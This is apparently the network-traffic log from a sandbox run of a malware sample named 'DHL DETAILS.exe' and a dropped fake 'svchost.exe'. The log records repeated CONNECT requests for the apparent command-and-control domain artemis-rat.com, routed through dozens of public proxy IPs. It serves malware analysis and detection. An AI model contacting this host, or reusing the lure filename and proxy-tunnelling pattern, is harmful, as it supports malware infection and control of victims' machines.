Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.290282011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1774	192.168.2.5	55248	180.250.159.49	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.294897079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1775	192.168.2.5	51522	148.66.130.53	5031	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.312752962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1776	192.168.2.5	54432	27.65.240.157	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.338351011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1777	192.168.2.5	55107	162.0.220.234	20523	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.343113899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1778	192.168.2.5	55032	43.133.136.208	8800	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.349569082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1779	192.168.2.5	51506	51.75.126.150	36694	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.351291895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.520829916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.520560980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.646347046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1780	192.168.2.5	55269	1.15.62.12	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.365135908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1781	192.168.2.5	55264	103.66.177.17	32251	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.365947962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1782	192.168.2.5	55001	36.95.235.18	3629	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.383507967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1783	192.168.2.5	53815	162.241.46.6	41442	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.383713007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1784	192.168.2.5	54123	142.93.2.226	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.448983908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.676642895 CET	19	IN	HTTP/1.0 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1785	192.168.2.5	55268	211.93.2.190	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.469743013 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:21.940397978 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1786	192.168.2.5	55154	51.89.173.40	20435	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.492049932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.567557096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.567670107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677371979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1787	192.168.2.5	55057	189.240.60.168	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.511181116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.009825945 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1788	192.168.2.5	55271	94.130.94.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.526720047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1789	192.168.2.5	55273	114.156.77.107	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.527703047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1790	192.168.2.5	55270	106.105.218.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.576721907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1791	192.168.2.5	55267	5.44.42.115	58386	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.579336882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
1792	192.168.2.5	55279	199.102.105.242	4145

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.582624912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1793	192.168.2.5	54460	27.65.114.8	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.585848093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1794	192.168.2.5	53879	192.99.207.129	63404	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.595535994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.676877022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.677004099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677786112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1795	192.168.2.5	54962	72.206.181.123	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.595536947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1796	192.168.2.5	53946	172.93.111.87	43209	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.595918894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1797	192.168.2.5	51626	52.151.210.204	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.610522985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1798	192.168.2.5	55275	43.155.170.35	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.642276049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1799	192.168.2.5	55276	219.71.216.78	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.642786026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.955982924 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1800	192.168.2.5	53983	45.225.204.8	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.650355101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1801	192.168.2.5	53802	154.118.228.212	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.655314922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
1802	192.168.2.5	55277	185.101.16.52	80

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.683476925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1803	192.168.2.5	54015	51.222.241.157	46286	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.695583105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.380075932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1804	192.168.2.5	53833	175.183.82.221	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.697073936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.797631025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.864722013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.974284887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1805	192.168.2.5	55274	43.231.22.228	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.707400084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1806	192.168.2.5	55031	74.119.147.209	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.708637953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
1807	192.168.2.5	55280	103.118.46.177	8080

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.736243963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1808	192.168.2.5	51810	166.62.38.100	56191	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.757920980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
1809	192.168.2.5	55282	201.13.147.161	5678

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.773822069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
1810	192.168.2.5	55281	61.178.152.31	7302

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:21.776873112 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:22.136538982 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1811	192.168.2.5	55328	104.16.104.12	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.425333977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.581192017 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1812	192.168.2.5	55333	104.25.167.88	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.453824043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.610743999 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1813	192.168.2.5	55357	172.67.181.20	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.481059074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
